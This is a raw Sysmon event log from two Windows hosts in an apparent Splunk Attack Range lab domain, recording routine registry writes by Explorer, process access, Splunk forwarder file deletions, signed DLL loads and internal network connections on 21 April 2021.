12 ; 1606949 ; win-host-5.attackrange.local ; CreateKey ; 2021-04-21 19:19:14.217 ; {21761711-84C9-607D-F200-00000000BB01} ; 3784 ; C:\Windows\Explorer.EXE ; HKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Modules\GlobalSettings\ProperTreeModuleInner
13 ; 1606948 ; win-host-5.attackrange.local ; SetValue ; 2021-04-21 19:19:14.064 ; {21761711-84C9-607D-F200-00000000BB01} ; 3784 ; C:\Windows\Explorer.EXE ; HKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\2\ApplicationViewManagement\W32:000000000007050C\VirtualDesktop ; Binary Data
12 ; 1606947 ; win-host-5.attackrange.local ; CreateKey ; 2021-04-21 19:19:14.064 ; {21761711-84C9-607D-F200-00000000BB01} ; 3784 ; C:\Windows\Explorer.EXE ; HKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\2\ApplicationViewManagement\W32:000000000007050C
13 ; 1606946 ; win-host-5.attackrange.local ; SetValue ; 2021-04-21 19:19:14.001 ; {21761711-84C9-607D-F200-00000000BB01} ; 3784 ; C:\Windows\Explorer.EXE ; HKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\MuiCache\104\52C64B7E\LanguageList ; Binary Data
13 ; 1606945 ; win-host-5.attackrange.local ; SetValue ; 2021-04-21 19:19:14.001 ; {21761711-84C9-607D-F200-00000000BB01} ; 3784 ; C:\Windows\Explorer.EXE ; HKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\MuiCache\104\52C64B7E\LanguageList ; Binary Data
13 ; 1606944 ; win-host-5.attackrange.local ; SetValue ; 2021-04-21 19:19:14.001 ; {21761711-84C9-607D-F200-00000000BB01} ; 3784 ; C:\Windows\Explorer.EXE ; HKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\MuiCache\104\52C64B7E\LanguageList ; Binary Data
13 ; 1606943 ; win-host-5.attackrange.local ; SetValue ; 2021-04-21 19:19:14.001 ; {21761711-84C9-607D-F200-00000000BB01} ; 3784 ; C:\Windows\Explorer.EXE ; HKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\MuiCache\104\52C64B7E\LanguageList ; Binary Data
13 ; 1606942 ; win-host-5.attackrange.local ; SetValue ; 2021-04-21 19:19:14.001 ; {21761711-84C9-607D-F200-00000000BB01} ; 3784 ; C:\Windows\Explorer.EXE ; HKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\HRZR_PGYFRFFVBA ; Binary Data
13 ; 1606941 ; win-host-5.attackrange.local ; SetValue ; 2021-04-21 19:19:14.001 ; {21761711-84C9-607D-F200-00000000BB01} ; 3784 ; C:\Windows\Explorer.EXE ; HKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count\Zvpebfbsg.Jvaqbjf.Rkcybere ; Binary Data
13 ; 1606940 ; win-host-5.attackrange.local ; SetValue ; 2021-04-21 19:19:14.001 ; {21761711-84C9-607D-F200-00000000BB01} ; 3784 ; C:\Windows\Explorer.EXE ; HKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\MuiCache\104\52C64B7E\LanguageList ; Binary Data
13 ; 1606939 ; win-host-5.attackrange.local ; SetValue ; 2021-04-21 19:19:14.001 ; {21761711-84C9-607D-F200-00000000BB01} ; 3784 ; C:\Windows\Explorer.EXE ; HKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Modules\GlobalSettings\ProperTreeModuleInner\ProperTreeModuleInner ; Binary Data
12 ; 1606938 ; win-host-5.attackrange.local ; CreateKey ; 2021-04-21 19:19:14.001 ; {21761711-84C9-607D-F200-00000000BB01} ; 3784 ; C:\Windows\Explorer.EXE ; HKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Modules\GlobalSettings\ProperTreeModuleInner
12 ; 1606937 ; win-host-5.attackrange.local ; CreateKey ; 2021-04-21 19:19:14.000 ; {21761711-84C9-607D-F200-00000000BB01} ; 3784 ; C:\Windows\Explorer.EXE ; HKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0
13 ; 1606936 ; win-host-5.attackrange.local ; SetValue ; 2021-04-21 19:19:14.000 ; {21761711-84C9-607D-F200-00000000BB01} ; 3784 ; C:\Windows\Explorer.EXE ; HKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx ; Binary Data
12 ; 1606935 ; win-host-5.attackrange.local ; CreateKey ; 2021-04-21 19:19:14.000 ; {21761711-84C9-607D-F200-00000000BB01} ; 3784 ; C:\Windows\Explorer.EXE ; HKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0
13 ; 1606934 ; win-host-5.attackrange.local ; SetValue ; 2021-04-21 19:19:14.000 ; {21761711-84C9-607D-F200-00000000BB01} ; 3784 ; C:\Windows\Explorer.EXE ; HKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots ; Binary Data
12 ; 1606933 ; win-host-5.attackrange.local ; CreateKey ; 2021-04-21 19:19:14.000 ; {21761711-84C9-607D-F200-00000000BB01} ; 3784 ; C:\Windows\Explorer.EXE ; HKU\S-1-5-21-3386589612-1946705271-3951022823-500_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU
10 ; 1095438 ; win-dc-982.attackrange.local ; 2021-04-21 19:19:14.483 ; {761B69BB-818C-607D-0C00-00000000BA01} ; 844 ; 972 ; C:\Windows\system32\svchost.exe ; {761B69BB-84E2-607D-1F03-00000000BA01} ; 5220 ; C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe ; 0x3600 ; C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
10 ; 1095437 ; win-dc-982.attackrange.local ; 2021-04-21 19:19:14.483 ; {761B69BB-818C-607D-0C00-00000000BA01} ; 844 ; 972 ; C:\Windows\system32\svchost.exe ; {761B69BB-84E4-607D-2203-00000000BA01} ; 5440 ; C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe ; 0x3600 ; C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
23 ; 1095436 ; win-dc-982.attackrange.local ; 2021-04-21 19:19:14.159 ; {761B69BB-820D-607D-D800-00000000BA01} ; 1064 ; NT AUTHORITY\SYSTEM ; C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe ; C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational ; MD5=F2C185FBC7583DE19B25EA168B921687,SHA256=2FE5020586ABB33BB74D1FCBBE8E35A4CF37AAE06B05AFE3F42CEDD86756211F,IMPHASH=00000000000000000000000000000000 ; false ; true
11 ; 1606964 ; win-host-5.attackrange.local ; 2021-04-21 19:19:15.436 ; {21761711-8437-607D-CE00-00000000BB01} ; 2032 ; C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe ; C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational ; 2021-04-19 13:21:25.072
11 ; 1606963 ; win-host-5.attackrange.local ; 2021-04-21 19:19:15.436 ; {21761711-8437-607D-CE00-00000000BB01} ; 2032 ; C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe ; C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security ; 2021-04-19 13:20:22.616
23 ; 1606962 ; win-host-5.attackrange.local ; 2021-04-21 19:19:15.436 ; {21761711-8437-607D-CE00-00000000BB01} ; 2032 ; NT AUTHORITY\SYSTEM ; C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe ; C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational ; MD5=947F5421D75EFF0C1F5AACBB3CDBBAC5,SHA256=33898142EEDB45EA5D35A74977AC856F4C2EE68E1B355963AA89C7486C204598 ; false ; false - insufficient disk space
23 ; 1606961 ; win-host-5.attackrange.local ; 2021-04-21 19:19:15.436 ; {21761711-8437-607D-CE00-00000000BB01} ; 2032 ; NT AUTHORITY\SYSTEM ; C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe ; C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security ; MD5=AF7E5CCE08589E2BDDC94D20C9A5A6F8,SHA256=95FB4DAE68AF713D3CB29862B45FCDCAF2400AC9A2561991349C239195DA3039 ; false ; false - insufficient disk space
3 ; 1606960 ; win-host-5.attackrange.local ; 2021-04-21 19:19:13.564 ; {21761711-83AE-607D-1400-00000000BB01} ; 480 ; C:\Windows\System32\svchost.exe ; NT AUTHORITY\NETWORK SERVICE ; udp ; true ; true ; a00:10f:0:0:58d1:635f:9ae:ffff ; - ; 61343 ; - ; true ; e000:fc:0:0:0:0:0:0 ; - ; 5355 ; llmnr
3 ; 1606959 ; win-host-5.attackrange.local ; 2021-04-21 19:19:13.564 ; {21761711-83AE-607D-1400-00000000BB01} ; 480 ; C:\Windows\System32\svchost.exe ; NT AUTHORITY\NETWORK SERVICE ; udp ; true ; true ; fe80:0:0:0:e939:94d:a3e8:982d ; win-host-5.attackrange.local ; 61343 ; - ; true ; ff02:0:0:0:0:0:1:3 ; - ; 5355 ; llmnr
3 ; 1606958 ; win-host-5.attackrange.local ; 2021-04-21 19:19:13.564 ; {21761711-83A4-607D-0100-00000000BB01} ; 4 ; System ; NT AUTHORITY\SYSTEM ; udp ; false ; false ; 10.0.1.255 ; ip-10-0-1-255.us-west-2.compute.internal ; 137 ; netbios-ns ; false ; 10.0.1.15 ; win-host-5.attackrange.local ; 137 ; netbios-ns
3 ; 1606957 ; win-host-5.attackrange.local ; 2021-04-21 19:19:13.564 ; {21761711-83A4-607D-0100-00000000BB01} ; 4 ; System ; NT AUTHORITY\SYSTEM ; udp ; true ; false ; 10.0.1.15 ; win-host-5.attackrange.local ; 137 ; netbios-ns ; false ; 10.0.1.255 ; ip-10-0-1-255.us-west-2.compute.internal ; 137 ; netbios-ns
11 ; 1606956 ; win-host-5.attackrange.local ; 2021-04-21 19:19:15.066 ; {21761711-842A-607D-9700-00000000BB01} ; 3716 ; C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe ; C:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xml ; 2021-04-19 13:22:46.774
23 ; 1606955 ; win-host-5.attackrange.local ; 2021-04-21 19:19:15.066 ; {21761711-842A-607D-9700-00000000BB01} ; 3716 ; NT AUTHORITY\SYSTEM ; C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe ; C:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xml ; MD5=E21F5C2105D3482548EE1DCEAA8E3F18,SHA256=A62C5AB5FD16B72845400EE5338C4D5D0AC27884510730AA80A58BEA4A9B021E ; false ; false - insufficient disk space
3 ; 1095445 ; win-dc-982.attackrange.local ; 2021-04-21 19:19:10.629 ; {761B69BB-8207-607D-CF00-00000000BA01} ; 4116 ; C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe ; NT AUTHORITY\SYSTEM ; tcp ; true ; false ; 10.0.1.14 ; win-dc-982.attackrange.local ; 1168 ; - ; false ; 10.0.1.12 ; - ; 8000 ; -
3 ; 1095444 ; win-dc-982.attackrange.local ; 2021-04-21 19:19:10.615 ; {761B69BB-819C-607D-2800-00000000BA01} ; 2912 ; C:\Windows\System32\dns.exe ; NT AUTHORITY\SYSTEM ; udp ; false ; false ; 10.0.1.14 ; win-dc-982.attackrange.local ; 53 ; domain ; false ; 10.0.1.15 ; ip-10-0-1-15.us-west-2.compute.internal ; 57003 ; -
3 ; 1095443 ; win-dc-982.attackrange.local ; 2021-04-21 19:19:10.613 ; {761B69BB-819C-607D-2800-00000000BA01} ; 2912 ; C:\Windows\System32\dns.exe ; NT AUTHORITY\SYSTEM ; udp ; false ; false ; 10.0.1.14 ; win-dc-982.attackrange.local ; 53 ; domain ; false ; 10.0.1.15 ; ip-10-0-1-15.us-west-2.compute.internal ; 52624 ; -
10 ; 1095442 ; win-dc-982.attackrange.local ; 2021-04-21 19:19:15.484 ; {761B69BB-818C-607D-0C00-00000000BA01} ; 844 ; 972 ; C:\Windows\system32\svchost.exe ; {761B69BB-84E2-607D-1F03-00000000BA01} ; 5220 ; C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe ; 0x3600 ; C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
10 ; 1095441 ; win-dc-982.attackrange.local ; 2021-04-21 19:19:15.484 ; {761B69BB-818C-607D-0C00-00000000BA01} ; 844 ; 972 ; C:\Windows\system32\svchost.exe ; {761B69BB-84E4-607D-2203-00000000BA01} ; 5440 ; C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe ; 0x3600 ; C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
23 ; 1095440 ; win-dc-982.attackrange.local ; 2021-04-21 19:19:15.164 ; {761B69BB-820D-607D-D800-00000000BA01} ; 1064 ; NT AUTHORITY\SYSTEM ; C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe ; C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational ; MD5=3C9568B60DEB8FF4977024A8884B76F5,SHA256=771630085153C475E42F28F80B4752CDEE9C5D0B5493E29FE13178644DE7EFEA,IMPHASH=00000000000000000000000000000000 ; false ; true
23 ; 1095439 ; win-dc-982.attackrange.local ; 2021-04-21 19:19:15.023 ; {761B69BB-820D-607D-D800-00000000BA01} ; 1064 ; NT AUTHORITY\SYSTEM ; C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe ; C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security ; MD5=026C2732F900FDF87615815C76A3607A,SHA256=D7CAD4F98C8D3F77CFBF854C12A5E0C09B3F1B61649353E306532B772E9EDE83,IMPHASH=00000000000000000000000000000000 ; false ; true
10 ; 1095448 ; win-dc-982.attackrange.local ; 2021-04-21 19:19:16.485 ; {761B69BB-818C-607D-0C00-00000000BA01} ; 844 ; 972 ; C:\Windows\system32\svchost.exe ; {761B69BB-84E2-607D-1F03-00000000BA01} ; 5220 ; C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe ; 0x3600 ; C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
10 ; 1095447 ; win-dc-982.attackrange.local ; 2021-04-21 19:19:16.485 ; {761B69BB-818C-607D-0C00-00000000BA01} ; 844 ; 972 ; C:\Windows\system32\svchost.exe ; {761B69BB-84E4-607D-2203-00000000BA01} ; 5440 ; C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe ; 0x3600 ; C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
23 ; 1095446 ; win-dc-982.attackrange.local ; 2021-04-21 19:19:16.175 ; {761B69BB-820D-607D-D800-00000000BA01} ; 1064 ; NT AUTHORITY\SYSTEM ; C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe ; C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational ; MD5=9BA21ACF97D96DC9AE43B2A7EBFC5C0A,SHA256=61A32F2BF31CEE83FDF1D35B0B82335E3955A109E256626061AF576CB5DA33D2,IMPHASH=00000000000000000000000000000000 ; false ; true
11 ; 1606973 ; win-host-5.attackrange.local ; 2021-04-21 19:19:16.539 ; {21761711-8437-607D-CE00-00000000BB01} ; 2032 ; C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe ; C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security ; 2021-04-19 13:20:22.616
23 ; 1606972 ; win-host-5.attackrange.local ; 2021-04-21 19:19:16.539 ; {21761711-8437-607D-CE00-00000000BB01} ; 2032 ; NT AUTHORITY\SYSTEM ; C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe ; C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security ; MD5=8853BA6A646622C564286C6D314EF6D7,SHA256=E0CC84039F554CB652334C5994181EAAAAC7BF0E7C83BF24F3CD670D4065831F ; false ; false - insufficient disk space
12 ; 1606971 ; win-host-5.attackrange.local ; CreateKey ; 2021-04-21 19:19:16.523 ; {21761711-84C9-607D-F200-00000000BB01} ; 3784 ; C:\Windows\Explorer.EXE ; HKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{bd98497a-0000-0000-0000-100000000000}
7 ; 1606970 ; win-host-5.attackrange.local ; 2021-04-21 19:19:16.454 ; {21761711-84C9-607D-F200-00000000BB01} ; 3784 ; C:\Windows\explorer.exe ; C:\Windows\System32\EhStorAPI.dll ; 10.0.14393.4169 (rs1_release.210107-1130) ; Windows Enhanced Storage API ; Microsoft® Windows® Operating System ; Microsoft Corporation ; EhStorapi.dll ; MD5=1287D2464B3F71ECC99316991E038B0B,SHA256=7FFA04958C7E76E42712E8D9E03037E3E98E2A6E1A6D277E48A76C55F4E794E8 ; true ; Microsoft Windows ; Valid
7 ; 1606969 ; win-host-5.attackrange.local ; 2021-04-21 19:19:16.454 ; {21761711-84C9-607D-F200-00000000BB01} ; 3784 ; C:\Windows\explorer.exe ; C:\Windows\System32\wpdshext.dll ; 10.0.14393.4169 (rs1_release.210107-1130) ; Portable Devices Shell Extension ; Microsoft® Windows® Operating System ; Microsoft Corporation ; WpdShExt.dll ; MD5=CEB555E9099888316A1E2ADE83BA82BF,SHA256=4110FFD5F08100D1F6E1005E2907460E40B3221A0833B821BE291657416E89F0 ; true ; Microsoft Windows ; Valid
7 ; 1606968 ; win-host-5.attackrange.local ; 2021-04-21 19:19:16.438 ; {21761711-84C9-607D-F200-00000000BB01} ; 3784 ; C:\Windows\explorer.exe ; C:\Windows\System32\PlayToDevice.dll ; 10.0.14393.4169 (rs1_release.210107-1130) ; PLAYTODEVICE DLL ; Microsoft® Windows® Operating System ; Microsoft Corporation ; PlaytoDevice.dll ; MD5=0B283806F6BEEE6509E9F8C3FCA10286,SHA256=4DC982EC3F8B81CF8BF0F56ED5CEF628C28A1620CC12B94CAFADCD7CE684B6E2 ; true ; Microsoft Windows ; Valid
3 ; 1606967 ; win-host-5.attackrange.local ; 2021-04-21 19:19:14.616 ; {21761711-842A-607D-9700-00000000BB01} ; 3716 ; C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe ; NT AUTHORITY\SYSTEM ; tcp ; true ; false ; 10.0.1.15 ; win-host-5.attackrange.local ; 49743 ; - ; false ; 10.0.1.12 ; ip-10-0-1-12.us-west-2.compute.internal ; 8089 ; -
11 ; 1606966 ; win-host-5.attackrange.local ; 2021-04-21 19:19:16.084 ; {21761711-8437-607D-CE00-00000000BB01} ; 2032 ; C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe ; C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational ; 2021-04-19 13:21:25.072
23 ; 1606965 ; win-host-5.attackrange.local ; 2021-04-21 19:19:16.084 ; {21761711-8437-607D-CE00-00000000BB01} ; 2032 ; NT AUTHORITY\SYSTEM ; C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe ; C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational ; MD5=4604ED8D71EEEE689E545EC097ADA721,SHA256=53B496B874561542EC30CB8E7CEAD4E6BB353ED796A5723EF9C9DE60F738DC59 ; false ; false - insufficient disk space
10 ; 1095451 ; win-dc-982.attackrange.local ; 2021-04-21 19:19:17.486 ; {761B69BB-818C-607D-0C00-00000000BA01} ; 844 ; 972 ; C:\Windows\system32\svchost.exe ; {761B69BB-84E2-607D-1F03-00000000BA01} ; 5220 ; C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe ; 0x3600 ; C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
10 ; 1095450 ; win-dc-982.attackrange.local ; 2021-04-21 19:19:17.486 ; {761B69BB-818C-607D-0C00-00000000BA01} ; 844 ; 972 ; C:\Windows\system32\svchost.exe ; {761B69BB-84E4-607D-2203-00000000BA01} ; 5440 ; C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe ; 0x3600 ; C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
23 ; 1095449 ; win-dc-982.attackrange.local ; 2021-04-21 19:19:17.180 ; {761B69BB-820D-607D-D800-00000000BA01} ; 1064 ; NT AUTHORITY\SYSTEM ; C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe ; C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational ; MD5=7FF966ED6FDB3C495DDBA97685B6AB72,SHA256=6F5EBC28E9A058BD66182B6A5D080A9C29456DF4CC5EECB6B497AB86EC6A6BAF,IMPHASH=00000000000000000000000000000000 ; false ; true
11 ; 1606975 ; win-host-5.attackrange.local ; 2021-04-21 19:19:17.106 ; {21761711-8437-607D-CE00-00000000BB01} ; 2032 ; C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe ; C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational ; 2021-04-19 13:21:25.072
23 ; 1606974 ; win-host-5.attackrange.local ; 2021-04-21 19:19:17.106 ; {21761711-8437-607D-CE00-00000000BB01} ; 2032 ; NT AUTHORITY\SYSTEM ; C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe ; C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational ; MD5=D26D987004B66FDC8510E66A438DCAE1,SHA256=E57B533DD5591422C1250A75149AA29CCFCA9DEFD8A0B549C1DEF93702FC5A88 ; false ; false - insufficient disk space
10 ; 1095454 ; win-dc-982.attackrange.local ; 2021-04-21 19:19:18.487 ; {761B69BB-818C-607D-0C00-00000000BA01} ; 844 ; 972 ; C:\Windows\system32\svchost.exe ; {761B69BB-84E2-607D-1F03-00000000BA01} ; 5220 ; C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe ; 0x3600 ; C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
10 ; 1095453 ; win-dc-982.attackrange.local ; 2021-04-21 19:19:18.487 ; {761B69BB-818C-607D-0C00-00000000BA01} ; 844 ; 972 ; C:\Windows\system32\svchost.exe ; {761B69BB-84E4-607D-2203-00000000BA01} ; 5440 ; C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe ; 0x3600 ; C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781
23 ; 1095452 ; win-dc-982.attackrange.local ; 2021-04-21 19:19:18.187 ; {761B69BB-820D-607D-D800-00000000BA01} ; 1064 ; NT AUTHORITY\SYSTEM ; C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe ; C:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational ; MD5=909176DABADEEF3D2DE5B06718FF8D6E,SHA256=0E3BC724D98381C6B4BACB834FFCFFB83C5BA3368E09868ECCA8C8ABDE25F699,IMPHASH=00000000000000000000000000000000 ; false ; true
3 ; 1606980 ; win-host-5.attackrange.local ; 2021-04-21 19:19:16.653 ; {21761711-8431-607D-C500-00000000BB01} ; 3840 ; C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe ; NT AUTHORITY\SYSTEM ; tcp ; true ; false ; 10.0.1.15 ; win-host-5.attackrange.local ; 49744 ; - ; false ; 10.0.1.12 ; ip-10-0-1-12.us-west-2.compute.internal ; 8000 ; -
